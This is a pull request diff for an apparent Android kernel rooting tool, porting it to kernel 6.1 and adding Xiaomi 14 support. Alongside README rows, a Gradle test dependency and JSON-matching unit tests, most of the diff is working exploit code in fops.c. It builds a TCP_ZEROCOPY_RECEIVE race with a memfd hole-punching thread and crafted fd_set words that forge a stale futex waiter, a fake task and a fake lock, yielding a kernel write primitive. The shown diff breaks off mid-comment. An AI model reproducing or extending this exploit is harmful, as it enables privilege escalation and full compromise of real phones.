### PR TITLE
port to 6.1, add xiaomi 14 (houji) support

### DIFF
--- a/README.md
+++ b/README.md
@@ -6,6 +6,7 @@
 
 | Kernel                                                 | Devices                                                          |
 | ------------------------------------------------------ |------------------------------------------------------------------|
+| `6.1.118-android14-11-gca0ef6d17716-ab13624819`        | Xiaomi 14                                                        |
 | `6.6.30-android15-8-g54dcbfbef792-ab12368803-4k`       | Red Magic Tablet 3 Pro                                           |
 | `6.6.77-android15-8-g4a507830d890-ab13636293-4k`       | Xiaomi Civi 5 Pro, REDMI K90 / 4 Turbo, POCO F7                  |
 | `6.6.77-android15-8-g63ce7556864c-ab13994517-4k`       | Xiaomi 15                                                        |

--- a/README_ZH.md
+++ b/README_ZH.md
@@ -6,6 +6,7 @@
 
 | Kernel                                                 | Devices                                                          |
 | ------------------------------------------------------ |------------------------------------------------------------------|
+| `6.1.118-android14-11-gca0ef6d17716-ab13624819`        | Xiaomi 14                                                        |
 | `6.6.30-android15-8-g54dcbfbef792-ab12368803-4k`       | Red Magic Tablet 3 Pro                                           |
 | `6.6.77-android15-8-g4a507830d890-ab13636293-4k`       | Xiaomi Civi 5 Pro, REDMI K90 / 4 Turbo, POCO F7                  |
 | `6.6.77-android15-8-g63ce7556864c-ab13994517-4k`       | Xiaomi 15                                                        |

--- a/app/build.gradle
+++ b/app/build.gradle
@@ -233,3 +233,10 @@ tasks.named('preBuild') {
 base {
     archivesName = "${appName}-v${appVersionName}(${gitVersionCode})"
 }
+
+dependencies {
+    testImplementation 'junit:junit:4.13.2'
+    // local unit tests run against a mockable android.jar whose org.json
+    // stubs throw; the real artifact shadows it on the test classpath
+    testImplementation 'org.json:json:20240303'
+}

--- a/app/src/main/java/com/ghostlock/app/MainActivity.java
+++ b/app/src/main/java/com/ghostlock/app/MainActivity.java
@@ -316,6 +316,12 @@ public class MainActivity extends Activity {
         if (builtinFieldDiffers(builtin, entry, "pselect_waiter_shift")) {
             return false;
         }
+        if (builtinFieldDiffers(builtin, entry, "compact_waiter")) {
+            return false;
+        }
+        if (builtinFieldDiffers(builtin, entry, "mm_struct_sz")) {
+            return false;
+        }
         if (entry.has("kernel_phys_load") && !entry.isNull("kernel_phys_load")) {
             long phys = entry.optLong("kernel_phys_load", 0);
             if (phys != MTK_DEFAULT_PHYS_LOAD && builtinFieldDiffers(builtin, entry, "kernel_phys_load")) {

--- a/app/src/main/java/com/ghostlock/app/MainActivity.java
+++ b/app/src/main/java/com/ghostlock/app/MainActivity.java
@@ -308,7 +308,7 @@ public class MainActivity extends Activity {
      * values equal those defaults.  A kernel_phys_load of 0x80000000 is the
      * MediaTek "no override" marker and is ignored as well.
      */
-    private static boolean matchesBuiltin(JSONObject entry) {
+    static boolean matchesBuiltin(JSONObject entry) {
         Map<String, Long> builtin = SupportedKernels.BUILTIN.get(entry.optString("release", ""));
         if (builtin == null) {
             return false;
@@ -331,7 +331,7 @@ public class MainActivity extends Activity {
         return !objectFieldDiffers(builtin, entry.optJSONObject("symbols")) && !objectFieldDiffers(builtin, entry.optJSONObject("struct_fields"));
     }
 
-    private static boolean builtinFieldDiffers(Map<String, Long> builtin, JSONObject entry, String key) {
+    static boolean builtinFieldDiffers(Map<String, Long> builtin, JSONObject entry, String key) {
         if (!entry.has(key) || entry.isNull(key)) {
             return false;
         }
@@ -342,7 +342,7 @@ public class MainActivity extends Activity {
     /**
      * True when any non-null field in `fields` differs from the built-in value.
      */
-    private static boolean objectFieldDiffers(Map<String, Long> builtin, JSONObject fields) {
+    static boolean objectFieldDiffers(Map<String, Long> builtin, JSONObject fields) {
         if (fields == null) {
             return false;
         }

--- a/app/src/test/java/com/ghostlock/app/MatchesBuiltinTest.java
+++ b/app/src/test/java/com/ghostlock/app/MatchesBuiltinTest.java
@@ -1,0 +1,90 @@
+package com.ghostlock.app;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertTrue;
+
+import org.json.JSONObject;
+import org.junit.Test;
+
+import java.util.Map;
+
+/**
+ * Every layout scalar in the built-in tables is load-bearing: an imported
+ * entry that differs in exactly one of them is a different waiter layout or
+ * slab stride and must survive the import and export filters instead of
+ * being dropped as identical.
+ */
+public class MatchesBuiltinTest {
+
+    /**
+     * First registered release whose built-in map carries both layout
+     * scalars. Entries are built from the generated map itself so the test
+     * tracks the tables without hardcoding offsets.
+     */
+    private static Map.Entry<String, Map<String, Long>> builtinWithLayoutScalars() {
+        for (Map.Entry<String, Map<String, Long>> e : SupportedKernels.BUILTIN.entrySet()) {
+            if (e.getValue().containsKey("compact_waiter")
+                    && e.getValue().containsKey("mm_struct_sz")) {
+                return e;
+            }
+        }
+        throw new AssertionError("no built-in table carries compact_waiter and mm_struct_sz");
+    }
+
+    private static JSONObject entryFor(String release, Map<String, Long> builtin) {
+        try {
+            JSONObject entry = new JSONObject();
+            entry.put("release", release);
+            // symbols and struct_fields stay absent; the filter ignores
+            // missing objects, so these cases isolate the scalar comparison
+            for (String key : new String[]{"pselect_waiter_shift", "compact_waiter", "mm_struct_sz"}) {
+                Long value = builtin.get(key);
+                if (value != null) {
+                    entry.put(key, value.longValue());
+                }
+            }
+            return entry;
+        } catch (Exception e) {
+            throw new AssertionError(e);
+        }
+    }
+
+    @Test
+    public void identicalEntryMatches() {
+        Map.Entry<String, Map<String, Long>> builtin = builtinWithLayoutScalars();
+        assertTrue(MainActivity.matchesBuiltin(entryFor(builtin.getKey(), builtin.getValue())));
+    }
+
+    @Test
+    public void differingCompactWaiterCountsAsDifferent() throws Exception {
+        Map.Entry<String, Map<String, Long>> builtin = builtinWithLayoutScalars();
+        JSONObject entry = entryFor(builtin.getKey(), builtin.getValue());
+        // 0 is the rb_node waiter layout a stale 6.6 table would carry
+        entry.put("compact_waiter", entry.optLong("compact_waiter") ^ 1);
+        assertFalse(MainActivity.matchesBuiltin(entry));
+    }
+
+    @Test
+    public void differingMmStructSzCountsAsDifferent() throws Exception {
+        Map.Entry<String, Map<String, Long>> builtin = builtinWithLayoutScalars();
+        JSONObject entry = entryFor(builtin.getKey(), builtin.getValue());
+        // +0x100 is the BTF stride the device SLUB layout corrects away
+        entry.put("mm_struct_sz", entry.optLong("mm_struct_sz") + 0x100);
+        assertFalse(MainActivity.matchesBuiltin(entry));
+    }
+
+    @Test
+    public void nullLayoutScalarsStayIgnored() throws Exception {
+        Map.Entry<String, Map<String, Long>> builtin = builtinWithLayoutScalars();
+        JSONObject entry = entryFor(builtin.getKey(), builtin.getValue());
+        entry.put("compact_waiter", JSONObject.NULL);
+        entry.put("mm_struct_sz", JSONObject.NULL);
+        assertTrue(MainActivity.matchesBuiltin(entry));
+    }
+
+    @Test
+    public void unknownReleaseNeverMatches() {
+        Map.Entry<String, Map<String, Long>> builtin = builtinWithLayoutScalars();
+        assertFalse(MainActivity.matchesBuiltin(entryFor("not-a-kernel", builtin.getValue())));
+    }
+}

--- a/src/core/common.h
+++ b/src/core/common.h
@@ -42,8 +42,15 @@
 
 #define KERNEL_PAGE_SETUP_ATTEMPTS 6
 #define SKB_DATA_DELTA (-0xe80LL)
-
 #define MM_STRUCT_SZ 0x500
+
+/* mm_struct stride: 6.6 GKI default above; 6.1 entries override at
+ * runtime; android14-6.1 KMI SLUB stride is 0x400, not the BTF size 0x3c0. */
+#define mm_struct_sz()                                                        \
+  (active_offsets && active_offsets->mm_struct_sz                             \
+       ? active_offsets->mm_struct_sz                                         \
+       : MM_STRUCT_SZ)
+
 #define MM_ORDER 3
 #define MM_PARTIALS 5
 extern int g_core_main;
@@ -79,10 +86,19 @@ extern int g_core_consumer;
 #define PSELECT_CONSUMER_BURST_CALLS 1
 #define PSELECT_CONSUMER_SETTLE_USEC 250000
 #define PSELECT_ENTER_DELAY_USEC 50000
+/* Timeout per waiter layout. 6.6 (select) keeps the proven {0, 200ms}.
+ * 6.1 compact (pselect) uses {1, 0}. The long window guarantees the
+ * consumer's 50ms enter delay always lands inside the pselect call even
+ * when crafted fd bits make it return early (Root-My-Galaxy slide_app.c behavior,
+ * device-proven). The pselect path below re-derives these from
+ * the active offsets; the macros remain the 6.6 defaults so that route
+ * is untouched. */
 #ifndef PSELECT_TIMEOUT_SEC
 #define PSELECT_TIMEOUT_SEC 0
 #endif
+#ifndef PSELECT_TIMEOUT_USEC
 #define PSELECT_TIMEOUT_USEC 200000
+#endif
 #ifndef ROUTE_WAIT_SECONDS
 #define ROUTE_WAIT_SECONDS 1
 #endif
@@ -186,10 +202,12 @@ uintptr_t prepare_good_kernel_page(void);
 
 void fdset_put_word(fd_set *set, int word, uint64_t value);
 uint64_t fdset_get_word(const fd_set *set, int word);
+int tcp_route_selected(void);
 void open_selected_fds(
     fd_set *in, fd_set *out, fd_set *ex, int read_fd, int write_fd);
 void prepare_pselect_fdsets(fd_set *in, fd_set *out, fd_set *ex);
 void do_pselect_fake_lock_route(void);
+void do_tcp_fake_lock_route(void);
 void reset_main_route_state(void);
 int run_main_route_threads(void);
 void set_pselect_write_mode(uintptr_t target, int mode);

--- a/src/core/common.h
+++ b/src/core/common.h
@@ -44,8 +44,7 @@
 #define SKB_DATA_DELTA (-0xe80LL)
 #define MM_STRUCT_SZ 0x500
 
-/* mm_struct stride: 6.6 GKI default above; 6.1 entries override at
- * runtime; android14-6.1 KMI SLUB stride is 0x400, not the BTF size 0x3c0. */
+/* mm_struct stride; 0 uses MM_STRUCT_SZ above. */
 #define mm_struct_sz()                                                        \
   (active_offsets && active_offsets->mm_struct_sz                             \
        ? active_offsets->mm_struct_sz                                         \
@@ -86,13 +85,7 @@ extern int g_core_consumer;
 #define PSELECT_CONSUMER_BURST_CALLS 1
 #define PSELECT_CONSUMER_SETTLE_USEC 250000
 #define PSELECT_ENTER_DELAY_USEC 50000
-/* Timeout per waiter layout. 6.6 (select) keeps the proven {0, 200ms}.
- * 6.1 compact (pselect) uses {1, 0}. The long window guarantees the
- * consumer's 50ms enter delay always lands inside the pselect call even
- * when crafted fd bits make it return early (Root-My-Galaxy slide_app.c behavior,
- * device-proven). The pselect path below re-derives these from
- * the active offsets; the macros remain the 6.6 defaults so that route
- * is untouched. */
+/* select() timeout defaults; the compact route overrides both. */
 #ifndef PSELECT_TIMEOUT_SEC
 #define PSELECT_TIMEOUT_SEC 0
 #endif

--- a/src/core/fops.c
+++ b/src/core/fops.c
@@ -1,5 +1,7 @@
 #include "common.h"
 #include <time.h>
+#include <netinet/in.h>
+#include <netinet/tcp.h>
 static double fops_elapsed_ms(struct timespec *ref) {
   struct timespec now;
   clock_gettime(CLOCK_MONOTONIC, &now);
@@ -10,9 +12,273 @@ extern int pselect_custom_write;
 int route_last_step;
 int route_last_errno;
 
+/* ---- TCP zerocopy route (Root-My-Pixel-Payloads src/61/fops.c do_tcp_fake_lock_route) ----
+ * The only device-proven 6.1 transport. getsockopt(TCP_ZEROCOPY_RECEIVE)
+ * parks a frame whose zc words overlap the stale futex waiter: zc[0x28]
+ * becomes waiter->task, zc[0x30] waiter->lock. */
+#define TCP_PUNCH_SHMEM_LEN (16 * 1024 * 1024)
+#define TCP_ROUTE_ATTEMPTS 2000
+#define TCP_ARM_SEQ 16
+#define TCP_POST_GETSOCKOPT_HOLD 20000
+
+struct tcp_punch_state {
+  int fd;
+  size_t page_size;
+};
+
+static atomic_int tcp_punch_go;
+static atomic_int tcp_punch_stop;
+static atomic_int tcp_punch_phase;
+
+static void tcp_wait_for_consumer_idle(void) {
+  atomic_store(&punch_consume_go, 0);
+  while (atomic_load(&consumer_inflight)) {
+    __asm__ volatile("yield" ::: "memory");
+  }
+}
+
+static int tcp_make_pair(int *client_fd, int *server_fd) {
+  int listener = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, 0);
+  if (listener < 0) {
+    return -1;
+  }
+  int one = 1;
+  setsockopt(listener, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
+
+  struct sockaddr_in addr;
+  memset(&addr, 0, sizeof(addr));
+  addr.sin_family = AF_INET;
+  addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+  addr.sin_port = 0;
+
+  if (bind(listener, (struct sockaddr *)&addr, sizeof(addr)) != 0 ||
+      listen(listener, 1) != 0) {
+    int saved = errno;
+    close(listener);
+    errno = saved;
+    return -1;
+  }
+
+  socklen_t addr_len = sizeof(addr);
+  if (getsockname(listener, (struct sockaddr *)&addr, &addr_len) != 0) {
+    int saved = errno;
+    close(listener);
+    errno = saved;
+    return -1;
+  }
+
+  *client_fd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, 0);
+  if (*client_fd < 0) {
+    int saved = errno;
+    close(listener);
+    errno = saved;
+    return -1;
+  }
+  if (connect(*client_fd, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
+    int saved = errno;
+    close(*client_fd);
+    close(listener);
+    errno = saved;
+    return -1;
+  }
+
+  *server_fd = accept4(listener, NULL, NULL, SOCK_CLOEXEC);
+  int saved = errno;
+  close(listener);
+  if (*server_fd < 0) {
+    close(*client_fd);
+    errno = saved;
+    return -1;
+  }
+  return 0;
+}
+
+static void *tcp_punch_thread(void *arg) {
+  disable_rseq_for_thread();
+  struct tcp_punch_state *state = arg;
+  while (!atomic_load(&tcp_punch_go) && !atomic_load(&tcp_punch_stop)) {
+    sched_yield();
+  }
+  while (!atomic_load(&tcp_punch_stop)) {
+    if (fallocate(state->fd, 0, 0, TCP_PUNCH_SHMEM_LEN) != 0) {
+      pr_warning("tcp punch fill errno=%d\n", errno);
+      break;
+    }
+    atomic_store(&tcp_punch_phase, 1);
+    if (fallocate(state->fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
+                  (off_t)state->page_size,
+                  TCP_PUNCH_SHMEM_LEN - state->page_size) != 0) {
+      pr_warning("tcp punch hole errno=%d\n", errno);
+    }
+    atomic_store(&tcp_punch_phase, 0);
+  }
+  return NULL;
+}
+
+void do_tcp_fake_lock_route(void) {
+  if (!page_base || !fake_lock || !fake_fops) {
+    route_last_step = 40;
+    route_last_errno = 0;
+    pr_error("tcp route missing page=%016zx lock=%016zx fops=%016zx\n",
+             page_base, fake_lock, fake_fops);
+    return;
+  }
+
+  int client_fd = -1;
+  int server_fd = -1;
+  int punch_fd = -1;
+  char *map = MAP_FAILED;
+  pthread_t puncher;
+  int puncher_started = 0;
+  int route_ok = 0;
+
+  if (tcp_make_pair(&client_fd, &server_fd) != 0) {
+    route_last_step = 41;
+    route_last_errno = errno;
+    pr_error("tcp route pair setup failed errno=%d\n", errno);
+    return;
+  }
+
+  size_t page_size = (size_t)sysconf(_SC_PAGESIZE);
+  punch_fd = (int)syscall(SYS_memfd_create, "ghostlock-tcp", MFD_CLOEXEC);
+  if (punch_fd < 0 ||
+      fallocate(punch_fd, 0, 0, TCP_PUNCH_SHMEM_LEN) != 0) {
+    route_last_step = 42;
+    route_last_errno = errno;
+    pr_error("tcp route memfd/fallocate errno=%d\n", errno);
+    goto out;
+  }
+  map = mmap(NULL, TCP_PUNCH_SHMEM_LEN, PROT_READ | PROT_WRITE,
+             MAP_SHARED, punch_fd, 0);
+  if (map == MAP_FAILED) {
+    route_last_step = 43;
+    route_last_errno = errno;
+    pr_error("tcp route mmap errno=%d\n", errno);
+    goto out;
+  }
+  for (size_t off = 0; off < TCP_PUNCH_SHMEM_LEN; off += page_size) {
+    map[off] = 0x55;
+  }
+
+  struct tcp_punch_state state = {.fd = punch_fd, .page_size = page_size};
+  /* clear before the thread can start */
+  atomic_store(&tcp_punch_stop, 0);
+  atomic_store(&tcp_punch_phase, 0);
+  atomic_store(&punch_consume_stop, 0);
+  atomic_store(&punch_consume_go, 0);
+  atomic_store(&consumer_calls, 0);
+  atomic_store(&consumer_success, 0);
+  if (pthread_create(&puncher, NULL, tcp_punch_thread, &state) != 0) {
+    route_last_step = 44;
+    route_last_errno = errno;
+    pr_error("tcp route punch thread errno=%d\n", errno);
+    goto out;
+  }
+  puncher_started = 1;
+
+  /* Root-My-Pixel-Payloads MAIN_TCP_PAYLOAD=1: the waiter->task word carries the phys
+   * alias of init_task, not the image address. */
+  uintptr_t waiter_task = SLIDE_INIT_TASK;
+  int arm_seq = TCP_ARM_SEQ;
+  int post_hold = TCP_POST_GETSOCKOPT_HOLD;
+  /* knobs from Root-My-Pixel-Payloads src/61, hardcoded to proven defaults */
+
+  pr_info("tcp route enter page=%016zx fake_lock=%016zx fake_w0=%016zx "
+          "fake_task=%016zx task=%016zx attempts=%d arm=%d hold=%d\n",
+          page_base, fake_lock, fake_w0, fake_task, waiter_task,
+          TCP_ROUTE_ATTEMPTS, arm_seq, post_hold);
+
+  atomic_store(&tcp_punch_go, 1);
+  /* Custom-write mode: fire the PI walk immediately (delay 0, per Root-My-Pixel-Payloads). */
+  atomic_store(&main_route_delay_usec, 0);
+
+  char sendbuf[64];
+  memset(sendbuf, 0x33, sizeof(sendbuf));
+
+  for (int i = 1; i <= TCP_ROUTE_ATTEMPTS && !route_ok; i++) {
+    int calls_before = atomic_load(&consumer_calls);
+    int success_before = atomic_load(&consumer_success);
+    (void)send(server_fd, sendbuf, sizeof(sendbuf), MSG_DONTWAIT);
+    while (atomic_load(&tcp_punch_phase)) {
+      sched_yield();
+    }
+    for (int spin = 0; !atomic_load(&tcp_punch_phase) && spin < 10000000;
+         spin++) {
+      __asm__ volatile("yield" ::: "memory");
+    }
+
+    unsigned char zc[0x40];
+    memset(zc, 0, sizeof(zc));
+    put64(zc, 0x18, (uint64_t)(uintptr_t)(map + page_size));
+    put32(zc, 0x20, sizeof(sendbuf));
+    put64(zc, 0x28, waiter_task);
+    put64(zc, 0x30, fake_lock);
+
+    if (i >= arm_seq) {
+      atomic_store(&punch_consume_go, i);
+    }
+    socklen_t len = sizeof(zc);
+    errno = 0;
+    int ret = getsockopt(client_fd, IPPROTO_TCP, TCP_ZEROCOPY_RECEIVE, zc,
+                         &len);
+    int saved_errno = errno;
+    if (i >= arm_seq) {
+      for (int spin = 0; spin < post_hold; spin++) {
+        __asm__ volatile("yield" ::: "memory");
+      }
+      tcp_wait_for_consumer_idle();
+    }
+
+    int calls = atomic_load(&consumer_calls);
+    int success = atomic_load(&consumer_success);
+    if (calls <= calls_before || success <= success_before) {
+      if ((i % 100) == 0 || ret != 0) {
+        pr_info("tcp route seq=%d ret=%d errno=%d len=%u calls=%d "
+                "success=%d\n",
+                i, ret, saved_errno, len, calls, success);
+      }
+      continue;
+    }
+    /* Consumer fired = the PI walk derefed the crafted waiter and wrote.
+     * Ghostlock stages verify their own effects; no cfi stage here. */
+    route_ok = 1;
+    route_last_step = 0;
+    route_last_errno = 0;
+  }
+
+out:
+  atomic_store(&punch_consume_go, 0);
+  atomic_store(&punch_consume_stop, 1);
+  atomic_store(&tcp_punch_go, 0);
+  atomic_store(&tcp_punch_stop, 1);
+  if (puncher_started) {
+    pthread_join(puncher, NULL);
+  }
+  if (map != MAP_FAILED) {
+    munmap(map, TCP_PUNCH_SHMEM_LEN);
+  }
+  if (punch_fd >= 0) {
+    close(punch_fd);
+  }
+  if (server_fd >= 0) {
+    close(server_fd);
+  }
+  if (client_fd >= 0) {
+    close(client_fd);
+  }
+  if (!route_ok && route_last_step == 0) {
+    route_last_step = 45;
+  }
+  pr_info("tcp route done=%d calls=%d success=%d step=%d errno=%d\n",
+          route_ok, atomic_load(&consumer_calls),
+          atomic_load(&consumer_success), route_last_step,
+          route_last_errno);
+}
+
 static int route_delay_usec(int attempt) {
   (void)attempt;
-  /* Let select() establish its stack frame before the PI walk. */
+  /* Both routes: let select/pselect establish its frame and stamp the
+   * crafted waiter before the PI walk fires. */
   return PSELECT_ENTER_DELAY_USEC;
 }
 
@@ -76,8 +342,8 @@ static void pselect_put_waiter_word(
 
 void open_selected_fds(
     fd_set *in, fd_set *out, fd_set *ex, int read_fd, int write_fd) {
+  /* every bit lands on the read end so select/pselect parks the full window */
   (void)write_fd;
-
   int high_read = fcntl(read_fd, F_DUPFD, PSELECT_ROUTE_NFDS + 32);
   if (high_read < 0) {
     pr_warning("pselect F_DUPFD read errno=%d\n", errno);
@@ -99,29 +365,58 @@ void prepare_pselect_fdsets(fd_set *in, fd_set *out, fd_set *ex) {
   FD_ZERO(ex);
 
   int words_per_set = pselect_words_per_set();
+  int compact = active_offsets && active_offsets->compact_waiter;
+
   struct pselect_waiter_word {
     int word;
     uint64_t value;
     const char *name;
-  } words[] = {
-    {2, 0, "tree_pc"},
-    {3, 0, "tree_right"},
-    {4, 0, "tree_left"},
-    {5, 1, "tree_prio"},
-    {6, 0, "tree_deadline"},
-    {7, 0, "pi_parent"},
-    {8, 0, "pi_right"},
-    {9, 0, "pi_left"},
-    {10, 1, "pi_prio"},
-    {11, 0, "pi_deadline"},
-    {12, fake_task, "task"},
-    {13, fake_lock, "lock"},
-    {14, 3, "wake_state"},
   };
-  for (size_t i = 0; i < sizeof(words) / sizeof(words[0]); i++) {
-    struct pselect_waiter_word *w = &words[i];
-    pselect_put_waiter_word(
-        in, out, ex, words_per_set, w->word, w->value, w->name);
+
+  if (compact) {
+    /* 6.1 compact write route (Root-My-Pixel-Payloads src/61/fops.c): tree/pi parents carry
+     * the write value, children the write target; waiter->task is the
+     * payload fake_task (planted fields for the PI walk). */
+    struct pselect_waiter_word words[] = {
+      {2, fake_right, "tree_pc"},
+      {3, 0, "tree_right"},
+      {4, pselect_custom_target, "tree_left"},
+      {5, fake_right, "pi_pc"},
+      {6, 0, "pi_right"},
+      {7, pselect_custom_target, "pi_left"},
+      {8, fake_task, "task"},
+      {9, fake_lock, "lock"},
+      {10, ((uint64_t)FAKE_WAITER_PRIO << 32) | 3, "wake_prio"},
+      {11, 0, "deadline"},
+      {12, 0, "ww_ctx"},
+    };
+    for (size_t i = 0; i < sizeof(words) / sizeof(words[0]); i++) {
+      struct pselect_waiter_word *w = &words[i];
+      pselect_put_waiter_word(
+          in, out, ex, words_per_set, w->word, w->value, w->name);
+    }
+  } else {
+    /* 6.6 rt_mutex_waiter with rb_node tree/pi_tree */
+    struct pselect_waiter_word words[] = {
+      {2, 0, "tree_pc"},
+      {3, 0, "tree_right"},
+      {4, 0, "tree_left"},
+      {5, 1, "tree_prio"},
+      {6, 0, "tree_deadline"},
+      {7, 0, "pi_parent"},
+      {8, 0, "pi_right"},
+      {9, 0, "pi_left"},
+      {10, 1, "pi_prio"},
+      {11, 0, "pi_deadline"},
+      {12, fake_task, "task"},
+      {13, fake_lock, "lock"},
+      {14, 3, "wake_state"},
+    };
+    for (size_t i = 0; i < sizeof(words) / sizeof(words[0]); i++) {
+      struct pselect_waiter_word *w = &words[i];
+      pselect_put_waiter_word(
+          in, out, ex, words_per_set, w->word, w->value, w->name);
+    }
   }
 }
 
@@ -140,6 +435,11 @@ void do_pselect_fake_lock_route(void) {
   int success = 0;
   int pipefd[2];
   SYSCHK(pipe(pipefd));
+
+  int compact_route = active_offsets && active_offsets->compact_waiter;
+
+  /* Both routes park on a never-ready timerfd: the waiter must stay stale
+   * on the pselect stack for the whole consumer window. */
   int block_fd = (int)syscall(SYS_timerfd_create, CLOCK_MONOTONIC, 0);
   if (block_fd < 0) {
     pr_warning("pselect timerfd_create failed errno=%d; using pipe read end\n",
@@ -177,6 +477,7 @@ void do_pselect_fake_lock_route(void) {
           (unsigned long long)fdset_get_word(&ex, 2),
           (unsigned long long)fdset_get_word(&ex, 3));
   open_selected_fds(&in, &out, &ex, high_read, pipefd[1]);
+  close(high_read);
 
   atomic_store(&consumer_calls, 0);
   atomic_store(&consumer_success, 0);
@@ -185,21 +486,42 @@ void do_pselect_fake_lock_route(void) {
   atomic_store(&main_route_delay_usec, delay_usec);
   atomic_store(&punch_consume_go, 1);
 
-  struct timeval timeout = {
-    .tv_sec = PSELECT_TIMEOUT_SEC,
-#ifdef PSELECT_TIMEOUT_USEC
-    .tv_usec = PSELECT_TIMEOUT_USEC,
-#else
-    .tv_usec = 0,
-#endif
-  };
-
-  pr_info("pselect pre-select +%.0fms\n", fops_elapsed_ms(&route_t0));
+  pr_info("pselect pre-select compact=%d +%.0fms\n", compact_route,
+          fops_elapsed_ms(&route_t0));
   errno = 0;
-  int ret = select(PSELECT_ROUTE_NFDS, &in, &out, &ex, &timeout);
+  int ret;
+  if (compact_route) {
+    struct timespec ts = {
+      .tv_sec = PSELECT_TIMEOUT_SEC,
+      .tv_nsec = (long)PSELECT_TIMEOUT_USEC * 1000,
+    };
+    ret = pselect(PSELECT_ROUTE_NFDS, &in, &out, &ex, &ts, NULL);
+  } else {
+    /* 6.6: select() with the proven {0, 200ms} window (unchanged). */
+    struct timeval timeout = {
+      .tv_sec = PSELECT_TIMEOUT_SEC,
+#ifdef PSELECT_TIMEOUT_USEC
+      .tv_usec = PSELECT_TIMEOUT_USEC,
+#else
+      .tv_usec = 0,
+#endif
+    };
+    ret = select(PSELECT_ROUTE_NFDS, &in, &out, &ex, &timeout);
+  }
   int saved_errno = errno;
-  pr_info("pselect post-select +%.0fms ret=%d\n", fops_elapsed_ms(&route_t0), ret);
+  pr_info("pselect post-select compact=%d +%.0fms ret=%d\n", compact_route,
+          fops_elapsed_ms(&route_t0), ret);
   atomic_store(&punch_consume_go, 0);
+
+  /* Root-My-Galaxy slide_pselect_stack_copy: when the consumer entered sched_setattr,
+   * wait for it to finish before tearing the fds down. The PI walk runs on
+   * the consumer's CPU and we must not close/reclaim the block fds while it
+   * still holds the crafted waiter on the stack. */
+  if (atomic_load(&consumer_inflight) != 0) {
+    for (int i = 0; i < 2000 && atomic_load(&consumer_inflight) != 0; i++) {
+      usleep(1000);
+    }
+  }
 
   calls = atomic_load(&consumer_calls);
   success = atomic_load(&consumer_success);
@@ -214,7 +536,7 @@ void do_pselect_fake_lock_route(void) {
     route_last_errno = saved_errno;
   }
 
-  close(high_read);
+  /* open_selected_fds only closes its own F_DUPFD copy */
   if (block_fd != pipefd[0]) {
     close(block_fd);
   }

--- a/src/core/fops.c
+++ b/src/core/fops.c
@@ -29,6 +29,8 @@ struct tcp_punch_state {
 static atomic_int tcp_punch_go;
 static atomic_int tcp_punch_stop;
 static atomic_int tcp_punch_phase;
+/* errno of the first puncher fallocate that failed; 0 while healthy */
+static atomic_int tcp_punch_failed;
 
 static void tcp_wait_for_consumer_idle(void) {
   atomic_store(&punch_consume_go, 0);
@@ -101,6 +103,7 @@ static void *tcp_punch_thread(void *arg) {
   }
   while (!atomic_load(&tcp_punch_stop)) {
     if (fallocate(state->fd, 0, 0, TCP_PUNCH_SHMEM_LEN) != 0) {
+      atomic_store(&tcp_punch_failed, errno ? errno : EIO);
       pr_warning("tcp punch fill errno=%d\n", errno);
       break;
     }
@@ -108,9 +111,15 @@ static void *tcp_punch_thread(void *arg) {
     if (fallocate(state->fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
                   (off_t)state->page_size,
                   TCP_PUNCH_SHMEM_LEN - state->page_size) != 0) {
+      /* without the hole the target page keeps its stale contents and the
+       * zerocopy write no longer lands as zeros */
+      atomic_store(&tcp_punch_failed, errno ? errno : EIO);
       pr_warning("tcp punch hole errno=%d\n", errno);
     }
     atomic_store(&tcp_punch_phase, 0);
+    if (atomic_load(&tcp_punch_failed)) {
+      break;
+    }
   }
   return NULL;
 }
@@ -164,6 +173,7 @@ void do_tcp_fake_lock_route(void) {
   /* clear before the thread can start */
   atomic_store(&tcp_punch_stop, 0);
   atomic_store(&tcp_punch_phase, 0);
+  atomic_store(&tcp_punch_failed, 0);
   atomic_store(&punch_consume_stop, 0);
   atomic_store(&punch_consume_go, 0);
   atomic_store(&consumer_calls, 0);
@@ -202,9 +212,17 @@ void do_tcp_fake_lock_route(void) {
     while (atomic_load(&tcp_punch_phase)) {
       sched_yield();
     }
-    for (int spin = 0; !atomic_load(&tcp_punch_phase) && spin < 10000000;
+    for (int spin = 0;
+         !atomic_load(&tcp_punch_phase) && !atomic_load(&tcp_punch_failed) &&
+         spin < 10000000;
          spin++) {
       __asm__ volatile("yield" ::: "memory");
+    }
+    if (atomic_load(&tcp_punch_failed)) {
+      route_last_step = 46;
+      route_last_errno = atomic_load(&tcp_punch_failed);
+      pr_error("tcp route puncher failed errno=%d\n", route_last_errno);
+      break;
     }
 
     unsigned char zc[0x40];
@@ -214,15 +232,16 @@ void do_tcp_fake_lock_route(void) {
     put64(zc, 0x28, waiter_task);
     put64(zc, 0x30, fake_lock);
 
-    if (i >= arm_seq) {
-      atomic_store(&punch_consume_go, i);
-    }
     socklen_t len = sizeof(zc);
     errno = 0;
     int ret = getsockopt(client_fd, IPPROTO_TCP, TCP_ZEROCOPY_RECEIVE, zc,
                          &len);
     int saved_errno = errno;
-    if (i >= arm_seq) {
+    /* Arm barrier: release the consumer only once the zerocopy write has
+     * landed in the waiter frame. Releasing earlier lets sched_setattr walk
+     * a half-written waiter and the attempt misses. */
+    if (i >= arm_seq && ret == 0) {
+      atomic_store(&punch_consume_go, i);
       for (int spin = 0; spin < post_hold; spin++) {
         __asm__ volatile("yield" ::: "memory");
       }
@@ -517,10 +536,12 @@ void do_pselect_fake_lock_route(void) {
    * wait for it to finish before tearing the fds down. The PI walk runs on
    * the consumer's CPU and we must not close/reclaim the block fds while it
    * still holds the crafted waiter on the stack. */
+  int consumer_stuck = 0;
   if (atomic_load(&consumer_inflight) != 0) {
     for (int i = 0; i < 2000 && atomic_load(&consumer_inflight) != 0; i++) {
       usleep(1000);
     }
+    consumer_stuck = atomic_load(&consumer_inflight) != 0;
   }
 
   calls = atomic_load(&consumer_calls);
@@ -537,11 +558,19 @@ void do_pselect_fake_lock_route(void) {
   }
 
   /* open_selected_fds only closes its own F_DUPFD copy */
-  if (block_fd != pipefd[0]) {
-    close(block_fd);
+  if (consumer_stuck) {
+    /* The consumer never came back from sched_setattr/futex. Closing would
